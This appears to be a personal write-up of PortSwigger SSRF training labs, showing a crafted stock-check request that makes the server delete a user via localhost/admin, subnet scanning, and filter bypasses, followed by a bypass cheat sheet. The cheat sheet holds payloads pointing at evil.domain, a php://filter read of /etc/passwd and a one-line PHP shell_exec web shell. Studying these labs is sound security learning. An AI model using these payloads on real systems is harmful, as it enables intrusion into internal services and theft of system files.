Learning SSRF with Portswigger Labs

Basic SSRF against the local Server

https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost

When accessing a product page an check stock link checks the stock through an API on some URL. We just need to change the url to localhost/admin where we can see user delete links and here we go with the request to delete that carlos:

POST /product/stock HTTP/1.1
Host: ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ace01fca1f144b2e80096a4b00aa0058.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
DNT: 1
Connection: close
Cookie: session=OQzPe2VCgJ9eEyxVAAO1RsYQYBBqDXj9
Upgrade-Insecure-Requests: 1

stockApi=http%3A%2F%2Flocalhost/admin/delete?username=carlos

Basic SSRRF against another backend system

Intruder setup to „scan“ the subnet, payload is numbers from 0-255
We found one host with HTTP status 200, that must be it
and we got it. ez af :)

SSRF with blacklist-based input filter

Aha. This one is harder, i’m looking for bypass methodologies and trying a lot of stuff like:

  • Encoding the URL with hex, URL, Octal, base64
  • Trying limiters: url.domain;other.domain @ $ etc.
  • data:// file:// gopher:// datatypes

All got me HTTP 400

"External stock check blocked for security reasons"
"Invalid external stock check url 'Invalid URL'"
{"error":"Path must start with /"}

Ok i tried to use a domain registered to localhost, this way i could get to 127.0.0.1, but with directory and parameters the filter got me again.

Hah. Ive got it…a little char case changing and it worked finally -.-‚

finally


I should AGAIN rtfm more…would have been easy if i’d read the challenge description xD

Ressources

Cheat Sheet

dict://
sftp://
ldap:// or ldaps:// or ldapi://
tftp://
gopher://
file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
zlib:// — Compression Streams
zip://
data:// — Data (RFC 2397)
glob:// — Find pathnames matching pattern
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR

expect:// — Process Interaction Streams

;”, “/”, “?”, “:”, “@”, “=” and “&” DELIMITERS in uri schemes
#

URI = scheme:[//authority]path[?query][#fragment]
where the authority component divides into three subcomponents authority = [userinfo@]host[:port]

http://url.domain@evil.domain
data://google.com/plain;base64,SSBsb3ZlIFBIUAo=
data://text/plain;base64,SSBsb3ZlIFBIUAo=google.com
0://evil$google.com
0://evil.com:80,google.com:80/
0://evil.com:80;google.com:80/

php://filter/convert.base64-encode/resource=/etc/passwd
php://input&cmd=ls POST data:

 <?php shell_exec($_GET['cmd']); ?>

data://text/plain;base64,MTI3LjAuMC4xL2FkbWluLw===stock.weliketoshop.net

zip://path/to/file.zip%23shell

DNS OWN DOMAIN TO 127.0.0.1!!!
different 127.1

upper lower case chars!!

xip.io
nip.io

Ressources

Leave a Comment